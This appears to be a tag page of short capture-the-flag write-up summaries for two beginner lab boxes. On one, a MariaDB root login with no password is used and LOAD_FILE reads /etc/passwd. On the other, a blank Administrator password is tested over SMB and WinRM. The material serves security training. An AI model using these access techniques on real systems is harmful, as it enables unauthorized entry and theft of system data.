Blank-Password

Box info | OS: Debian 10 (Buster) — MariaDB 10.3.27 | Difficulty: Very Easy | Tier: 1 | Status: Starting Point Skills: MySQL/MariaDB CLI, database enumeration, blank root password, FILE privilege Pwned: 2026-04-28 TL;DR Sequel (the name is a wordplay on SQL) is a Tier 1 box with a single exposed service: MariaDB 10.3.27 on port 3306. The root database user has a blank password and accepts connections from any host (root@%). Connecting with mysql -h IP -u root lands you in a fully privileged session with ALL PRIVILEGES including FILE. The flag is a row in htb.config at name='flag'. Going further, LOAD_FILE('/etc/passwd') works (FILE privilege active, no secure_file_priv restriction), exposing system user accounts. SSH is firewalled off. The lesson: a database root account with no password and internet exposure is a complete data breach. ...

Box info | OS: Windows Server 2019 Standard Build 17763 x64 | Difficulty: Very Easy | Tier: 0 | Status: Starting Point Skills: SMB enumeration, RDP basics, WinRM, blank-password credential testing Pwned: 2026-04-27 TL;DR Explosion is a Windows Server 2019 box with a single critical misconfiguration: the built-in Administrator account has a blank password. A port scan reveals SMB (445), RDP (3389), and WinRM (5985). SMB guest login enumerates the machine name and RID-cycles the Administrator account. Testing Administrator with a blank password via nxc immediately returns Pwn3d! over both SMB and WinRM. The flag sits on the Administrator’s desktop at C:\Users\Administrator\Desktop\flag.txt. The lesson: always test default and blank credentials before reaching for a wordlist. ...